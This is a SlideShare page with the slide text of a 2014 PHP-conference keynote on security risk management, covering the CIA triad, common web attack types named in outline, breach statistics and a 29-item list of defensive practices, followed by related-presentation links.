SlideShare une entreprise Scribd logo

Former CTO Shares Tips on Security Risk Management

Alison Gianotto
Alison Gianotto

Keynote for LonestarPHP 2014

TechnologieBusiness
1  sur  41
Télécharger pour lire hors ligne
Alison Gianotto @snipeyhead
Alison Gianotto (aka “snipe”)WHO AM I? • Former  agency  CTO/CSO   • Security  &  privacy  advocate   • 20  years  in  IT  and  so<ware  development   • Co-­‐author  of  a  few  PHP/MySQL  books   • Survivor  of  more  corporate  audits  than  I   care  to  remember   • @snipeyhead  on  TwiJer   2  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
WHAT SECURITY ISN’T 1 Bolted on 2 Compliance 3 A Single Person 4 Outsourced 3   You  don’t  add  it  on  at  the  end.     You  can  be  compliant  and  not   secure.  Just  ask  Target.   Security  is  everyone’s  responsibility.   Throwing  money  at  this  problem   won’t  work.   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
WHAT SECURITY ISN’T 5 An Appliance 6 Silver Bullet 7 Straightforward 4   Firewalls  and  IDS  are  part  of  the   soluUon,  but  not  the  end.   There  is  no  one  thing.  Defence  in   depth  maJers.  Sort  of.     SomeUmes  implemenUng  security   tools  increases  your  aJack  surface.   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   8 Done Security  is  where  you  start,  not   where  you  finish.  
WHAT RISK ISN’T 1 Stifling 2 Boring 3 Avoidable 5   Managing  risk  doesn’t  have  to   hinder  innovaUon   Our  job  is  finding  creaUve  soluUons   to  problems.  This  is  one  more  tool.   Risk  isn’t  inherently  bad.  Not   understanding  your  risk  is.     Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   4 One Size Acceptable  risk  to  your  company   may  not  be  the  same  as  someone   else’s.    
IT IS IMPOSSIBLE TO ANTICIPATE EVERY RISK. 6  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Srsly.
DEFENSE IN DEPTH PROMISES 7  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • MiUgates  single  points  of  failure.  (“Bus  factor”)   • Requires  more  effort  on  the  part  of  the  aJacker,   theoreUcally  exhausUng  aJacker  resources.     Except...
DEFENSE IN DEPTH PROBLEMS 8  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Larger,  more  complicated  systems  are  harder  to  maintain.     • Leads  to  more  cracks  for  bad  guys  to  poke  at   • More  surfaces  that  can  get  be  overlooked     • The  bad  guys  have  nearly  limitless  resources.  We  don’t.     • AJacks  are  commodiUzed  now.    Botnets  for  $2/hour.  
CIA Confidentiality, Integrity & Availability
CONFIDENTIALITY IS A SET OF RULES THAT LIMITS ACCESS TO INFORMATION 10  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
CONFIDENTIALITY EXAMPLES 11  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Passwords.  (boo!)   • Data  encrypUon  (at  rest  and   in  transmission.)   • Two-­‐factor  authenUcaUon/ biometrics.  (Yay!)   • Corporate  VPN   • IP  WhitelisUng   • SSH  keys  
CONFIDENTIALITY RISKS 12  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • No  brute-­‐force  detecUon   • No  velng  of  how  third-­‐ party  vendors  use/store   customer  data   • InformaUon  leakage  from   login  messages  (Uming   aJacks,  etc.)   • SQL  injecUon     • Privilege  escalaUon  leading   to  admin  access     • Passwords  shared  across   websites   • Improper  disposal/ destrucUon  of  personal   data   • Lost/stolen  devices    
INTEGRITY IS THE ASSURANCE THAT THE INFORMATION IS TRUSTWORTHY & ACCURATE. 13  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
INTEGRITY RISKS 14  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Data  loss  due  to  hardware   failure  (server  crash!)   • So<ware  bug  that   unintenUonally  deletes/ modifies  data   • Data  alteraUon  via   authorized  persons  (human   error)   • Data  alteraUon  via   unauthorized  persons   (hackers)   • No  backups  or  no  way  to   verify  the  integrity  of  the   backups  you  have   • Third-­‐party  vendor  with   inadequate  security  
AVAILABILITY IS A GUARANTEE OF READY ACCESS TO THE INFO BY AUTHORIZED PEOPLE. 15  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
AVAILABILITY RISKS 16  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • DDoS  aJacks   • Third-­‐party  service  failures   • Hardware  failures   • So<ware  bugs   • Untested  so<ware  patches   • Natural  disasters   • Man-­‐made  disasters  
THINK YOU’RE TOO SMALL TO BOTHER WITH? 17  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Think again.
WHY HACK? 18  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • To  steal/sell  idenUUes,  credit   card  numbers,  corporate   secrets,  military  secrets   • Fun,  Excitement  and/or   Notoriety   • PoliUcal  (“HackUvism”)   • Revenge   • Blackhat  SEO   • ExtorUon/Ransomware  
COMMON ATTACKS 19  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Reflected  XSS   • Persistent  XSS   • CSRF   • SQL  InjecUon   • Remote  file  inclusion     • Local  file  inclusion/directory   traversal   • HosUng  malware   • Defacement  for  SEO   (pharma,  etc)   • Privilege  escalaUon    
WHY MEEEEEEEEEEEE?? 20  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Users  re-­‐use  passwords   across  websites   • Watering  hole  aJack   • Low-­‐hanging  fruit   • Assumed  fewer  defenses   • To  gain  more  informaUon  on   users  to  execute  spear-­‐ phishing  aJacks   • Because  you  are  vulnerable.   Period.  
IN 2013, 61% OF REPORTED ATTACKS TARGETED SMALL AND MEDIUM BUSINESSES, UP FROM 50% IN 2012. 21  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
1 2 43 REFLECTED XSS SOCIAL     ENGINEERING   XSS   SESSION   HIJACK   PWNED   22  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
77% OF LEGITIMATE WEBSITES HAD EXPLOITABLE VULNERABILITIES. 1-IN-8 HAD A CRITICAL VULNERABILITY. 23  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
MEGA BREACHES: RESULTING IN PERSONAL DETAILS OF >= 10 MILLION IDENTITIES EXPOSED IN AN INDIVIDUAL INCIDENT. 24  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
THERE WERE EIGHT IN 2013, COMPARED WITH ONLY ONE IN 2012. 25  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014     +700%
OCT 2013: ADOBE EXPOSED CUSTOMER DATA, DEBIT/ CREDIT CARD NUMBERS, SOURCE IMPACTED: 152 MILLION USERS 26  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
DEC 2013: TARGET EXPOSED CUSTOMER DATA, DEBIT/ CREDIT CARD NUMBERS, PINS IMPACTED: 110 MILLION USERS 27  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
BREACHGrowth •  credit  card  info •  birth  dates •  government  ID  numbers •  home  addresses •  medical  records •  phone  numbers •  financial  informa9on •  email  addresses •  login •  passwords Data Stolen 28  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   232   552   0   100   200   300   400   500   600   2011   2013   Iden99es  Stolen  by  Year  (in  Millions)   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014    
190,000 464,000 570,000 2011   2012   2013   ATTACKS 29   Source:  Symantec  Internet  Security  Threat  Report  2014  ::  Volume  19,  Published  April  2014     Per Day Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
APPSEC STRATEGY PICK  TWO   30   COMPLETELY  BONED  COMPLETELY  BONED   COMPLETELY  BONED   Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  
CREATING A RISK MATRIX 31  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   • Type   • Third-­‐Party   • Dataflow  diagram  ID   • DescripUon   • Triggering  AcUon   • Consequence  of  Service   Failure   • Risk  of  Failure   • User  Impact   • Method  used  for  monitoring   this  risk   • Efforts  to  MiUgate  in  Case  of   Failure   • Contact  info   Grab  a  starter  template  here!     hJp://snipe.ly/risk_matrix    
29 THINGS YOU CAN START DOING TODAY. 32  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   Dooo eeeeeet.
33  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   1.  Start  every  project  risk-­‐first.   2.  Start  using  a  risk  matrix  for  every  major  project  or   product.   3.  Build  a  clear  inventory  of  surface  areas  and  their  value.   Get  stakeholders  involved.   4.  Make  sure  you  understand  what  happens  when  third-­‐ party  services  fail  or  behave  unexpectedly.       29 THINGS TO DO TODAY
34  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   5.  Trust  your  gut.  If  something  doesn’t  look  right,  it  probably   isn’t.   6.  Keep  your  systems  as  simple  as  possible.  Document  them.   7.  Favor  self-­‐documenUng  systems  so  that  code,  systems  and   docs  don't  fall  out  of  sync.   8.  Increased  transparency  reduces  risk  across  departments.   Consider  devops.     29 THINGS TO DO TODAY
35  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   9.  Don't  abstract  code/systems  if  you  don’t  have  to.   Premature  opUmizaUon  is  the  devil.  Build  light  and   refactor  as  needed.   10.   Get  to  know  your  users’  behavior.  Use  tools  like  Google   AnalyUcs  and  heat-­‐mapping  to  understand  what  users  do   on  your  site.  Be  suspicious  if  it  changes  for  no  apparent   reason.   29 THINGS TO DO TODAY
36  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   11.   Automate  EVERYTHING  (Chef,  Vagrant,  Ansible,  Salt,   Fabric,  etc.)   12.   Log  (almost!)  EVERYTHING.  Know  where  your  logs  are.   Use  a  central  logging  server  if  at  all  possible.     13.   Always  employ  the  principles  of  “least  privilege.”   14.   Give  preference  to  vendors  that  integrate  with  your  AD/     OD/LDAP.   29 THINGS TO DO TODAY
37  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   15.   Create  a  reliable  data  backup  plan  and  TEST  IT.  (MORE   THAN  ONCE.)   16.   Create  a  Business  ConUnuity  Plan.   17.   Create  an  Incident  Response  Plan.  Test  it.   18.   Create  a  Disaster  Recovery  Plan.  TEST  IT.  (Seriously.)   19.   Get  your  team  to  parUcipate  in  at  least  one  CTF  every   year.     29 THINGS TO DO TODAY
29 THINGS TO DO TODAY 38  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   20.   Strip  specific  messaging  from  login  forms.   21.   Use  solid  password+salUng  like  bcrypt.   22.   Implement  brute-­‐force  prevenUon  for  all  login  systems.   23.   Encrypt  everything,  where  feasible.   24.   Only  collect  the  data  that  you  absolutely  need.   25.   Implement  two-­‐factor  authenUcaUon.  It’s  easier  than  you   think.  
29 THINGS TO DO TODAY 39  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   26.   Supress  debugging  and  server  informaUon  (PHP  versions,   Apache  versions)   27.   Leverage  framework  CSRF  protecUon  and  data   saniUzaUon/validaUon.   28.   Perform  regular  penetraUon  tests  and  vulnerability   assessments   29.   Become  a  passionate  security  ambassador  for  your  users   and  co-­‐workers.      
CAPTURE ALL THE FLAGS! 40  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14   •  NotSoSecure  CTF:  hJp://cx.notsosecure.com   •  Security  Shepherd:  hJps://www.owasp.org/index.php/ OWASP_Security_Shepherd   •  hJp://hax.tor.hu/   •  hJps://pwn0.com/   •  hJp://www.smashthestack.org/   •  hJp://www.hellboundhackers.org/   •  hJp://www.overthewire.org/wargames/   •  hJp://counterhack.net/Counter_Hack/Challenges.html   •  hJp://www.hackthissite.org/   •  hJp://exploit-­‐exercises.com/   •  hJp://vulnhub.com/  
Alison Gianotto (aka “snipe”)THANK YOU! • @snipeyhead  on  TwiJer   • snipe@snipe.net   41  Lonestar  PHP  -­‐  April  2014  -­‐  #lsp14  

Recommandé

MacIT 2014 - Essential Security & Risk Fundamentals
MacIT 2014 - Essential Security & Risk FundamentalsMacIT 2014 - Essential Security & Risk Fundamentals
MacIT 2014 - Essential Security & Risk FundamentalsAlison Gianotto
 
P Hundamental Security Coding Secure With Php Lamp
P Hundamental Security Coding Secure With Php LampP Hundamental Security Coding Secure With Php Lamp
P Hundamental Security Coding Secure With Php Lampphptechtalk
 
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesOWASP Delhi
 
An Introduction To IT Security And Privacy In Libraries
An Introduction To IT Security And Privacy In Libraries An Introduction To IT Security And Privacy In Libraries
An Introduction To IT Security And Privacy In LibrariesBlake Carver
 
An Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & AnywhereAn Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & AnywhereBlake Carver
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
An Introduction To IT Security And Privacy for Librarians and Libraries
An Introduction To IT Security And Privacy for Librarians and LibrariesAn Introduction To IT Security And Privacy for Librarians and Libraries
An Introduction To IT Security And Privacy for Librarians and LibrariesBlake Carver
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamMohammed Adam
 

Recommandé

MacIT 2014 - Essential Security & Risk Fundamentals
MacIT 2014 - Essential Security & Risk FundamentalsMacIT 2014 - Essential Security & Risk Fundamentals
MacIT 2014 - Essential Security & Risk FundamentalsAlison Gianotto
 
P Hundamental Security Coding Secure With Php Lamp
P Hundamental Security Coding Secure With Php LampP Hundamental Security Coding Secure With Php Lamp
P Hundamental Security Coding Secure With Php Lampphptechtalk
 
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesOWASP Delhi
 
An Introduction To IT Security And Privacy In Libraries
An Introduction To IT Security And Privacy In Libraries An Introduction To IT Security And Privacy In Libraries
An Introduction To IT Security And Privacy In LibrariesBlake Carver
 
An Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & AnywhereAn Introduction To IT Security And Privacy In Libraries & Anywhere
An Introduction To IT Security And Privacy In Libraries & AnywhereBlake Carver
 
CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014CMS Hacking Tricks - DerbyCon 4 - 2014
CMS Hacking Tricks - DerbyCon 4 - 2014Greg Foss
 
An Introduction To IT Security And Privacy for Librarians and Libraries
An Introduction To IT Security And Privacy for Librarians and LibrariesAn Introduction To IT Security And Privacy for Librarians and Libraries
An Introduction To IT Security And Privacy for Librarians and LibrariesBlake Carver
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamMohammed Adam
 
GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
vodQA(Pune) 2018 - QAing the security way
vodQA(Pune) 2018 - QAing the security wayvodQA(Pune) 2018 - QAing the security way
vodQA(Pune) 2018 - QAing the security wayvodQA
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of DreamsGreg Foss
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeEC-Council
 
QAing the security way!
QAing the security way!QAing the security way!
QAing the security way!Amit Gundiyal
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Security Weekly
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
Give Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasyGive Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasySecurity Weekly
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014Security Weekly
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListSecurity Weekly
 
A journey into Application Security
A journey into Application SecurityA journey into Application Security
A journey into Application SecurityChristian Martorella
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionGreg Foss
 
Via forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linuxVia forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linuxviaForensics
 
Owasp for testing_mobile_apps_opd
Owasp for testing_mobile_apps_opdOwasp for testing_mobile_apps_opd
Owasp for testing_mobile_apps_opdPawel Rzepa
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINTJerod Brennen
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...RootedCON
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 
dotScale 2014
dotScale 2014dotScale 2014
dotScale 2014Alison Gianotto
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsZivaro Inc
 

Contenu connexe

Tendances

GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseAndrew Morris
 
vodQA(Pune) 2018 - QAing the security way
vodQA(Pune) 2018 - QAing the security wayvodQA(Pune) 2018 - QAing the security way
vodQA(Pune) 2018 - QAing the security wayvodQA
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of DreamsGreg Foss
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeEC-Council
 
QAing the security way!
QAing the security way!QAing the security way!
QAing the security way!Amit Gundiyal
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Security Weekly
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksGreg Foss
 
Give Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasyGive Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasySecurity Weekly
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014Security Weekly
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListSecurity Weekly
 
A journey into Application Security
A journey into Application SecurityA journey into Application Security
A journey into Application SecurityChristian Martorella
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionGreg Foss
 
Via forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linuxVia forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linuxviaForensics
 
Owasp for testing_mobile_apps_opd
Owasp for testing_mobile_apps_opdOwasp for testing_mobile_apps_opd
Owasp for testing_mobile_apps_opdPawel Rzepa
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINTJerod Brennen
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...RootedCON
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoJohn Bambenek
 

Tendances (20)

GreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To NoiseGreyNoise - Lowering Signal To Noise
GreyNoise - Lowering Signal To Noise
 
vodQA(Pune) 2018 - QAing the security way
vodQA(Pune) 2018 - QAing the security wayvodQA(Pune) 2018 - QAing the security way
vodQA(Pune) 2018 - QAing the security way
 
Threat Intelligence Field of Dreams
Threat Intelligence Field of DreamsThreat Intelligence Field of Dreams
Threat Intelligence Field of Dreams
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
 
QAing the security way!
QAing the security way!QAing the security way!
QAing the security way!
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
Robots, Ninjas, Pirates and Building an Effective Vulnerability Management Pr...
 
Wi-Fi Hotspot Attacks
Wi-Fi Hotspot AttacksWi-Fi Hotspot Attacks
Wi-Fi Hotspot Attacks
 
Give Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made EasyGive Me Three Things: Anti-Virus Bypass Made Easy
Give Me Three Things: Anti-Virus Bypass Made Easy
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted List
 
A journey into Application Security
A journey into Application SecurityA journey into Application Security
A journey into Application Security
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
 
Via forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linuxVia forensics thotcon-2013-mobile-security-with-santoku-linux
Via forensics thotcon-2013-mobile-security-with-santoku-linux
 
Owasp for testing_mobile_apps_opd
Owasp for testing_mobile_apps_opdOwasp for testing_mobile_apps_opd
Owasp for testing_mobile_apps_opd
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINT
 
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
Jaime Blasco - Fighting Advanced Persistent Threat (APT) with Open Source Too...
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Defcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using CryptoDefcon Crypto Village - OPSEC Concerns in Using Crypto
Defcon Crypto Village - OPSEC Concerns in Using Crypto
 

Similaire à Former CTO Shares Tips on Security Risk Management

Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsZivaro Inc
 
Website Security Threats - January 2014 Update
Website Security Threats - January 2014 Update Website Security Threats - January 2014 Update
Website Security Threats - January 2014 Update Symantec Website Security
 
SplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunkSummit 2015 - Splunk User Behavioral Analytics
SplunkSummit 2015 - Splunk User Behavioral AnalyticsSplunk
 
PCI DSS Simplified: What You Need to Know
PCI DSS Simplified: What You Need to KnowPCI DSS Simplified: What You Need to Know
PCI DSS Simplified: What You Need to KnowAlienVault
 
Symantec Intelligence Report December 2014
Symantec Intelligence Report December 2014Symantec Intelligence Report December 2014
Symantec Intelligence Report December 2014Symantec
 
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industrySeminario-15-04-2015-IT_professions_in_the_anti-malware_industry
Seminario-15-04-2015-IT_professions_in_the_anti-malware_industryRoberto Sponchioni
 
Combating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutCombating Insider Threats – Protecting Your Agency from the Inside Out
Combating Insider Threats – Protecting Your Agency from the Inside OutLancope, Inc.
 
The malware monetization machine
The malware monetization machineThe malware monetization machine
The malware monetization machinePriyanka Aash
 
Save Your Network – Protecting Manufacturing Data from Deadly Breaches
Save Your Network – Protecting Manufacturing Data from Deadly BreachesSave Your Network – Protecting Manufacturing Data from Deadly Breaches
Save Your Network – Protecting Manufacturing Data from Deadly BreachesLancope, Inc.
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksCiNPA Security SIG
 
Cyber Risk Management in 2017 - Challenges & Recommendations
Cyber Risk Management in 2017 - Challenges & RecommendationsCyber Risk Management in 2017 - Challenges & Recommendations
Cyber Risk Management in 2017 - Challenges & RecommendationsUlf Mattsson
 
(Certificates2019)alireza.ghahrood
(Certificates2019)alireza.ghahrood(Certificates2019)alireza.ghahrood
(Certificates2019)alireza.ghahroodAlireza Ghahrood
 
